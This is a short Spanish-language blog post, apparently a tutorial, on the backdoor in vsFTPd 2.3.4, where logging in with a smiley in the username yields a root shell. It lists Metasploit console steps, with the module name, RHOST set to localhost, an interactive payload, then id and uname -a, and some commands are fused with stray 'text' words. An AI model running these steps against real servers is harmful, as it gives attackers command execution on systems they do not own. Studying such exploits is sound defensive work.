Bueno, ante todo perdon por la inactividad que hemos tenido estos meses pasados.
Hace poco se descubrió una grave vulnerabilidad en el servidor vsFTPd v2.3.4, y en el blog de Blackploit han publicado un vídeo de su explotación con metasploit.
El bug encontrado es una puerta trasera creada intencionadamente por el creador con el cual se puede acceder al FTP con permisos de administrador.
El Backdoor consiste en que accediendo al FTP y poniendo de usuario 🙂 se conseguía acceso total y ejecución de comandos en el servidor al devolver una shell del sistema. Así de simple.
Como ya os imagináis no hace falta metasploit… pero bueno.
Pasos:
text
use exploit/unix/ftp/vsftpd_234_backdoortext
set RHOST localhosttext
set PAYLOAD cmd/unix/interacttext
exploittext
idtext
uname -aFuente: blackploit
Mas información:
Comentarios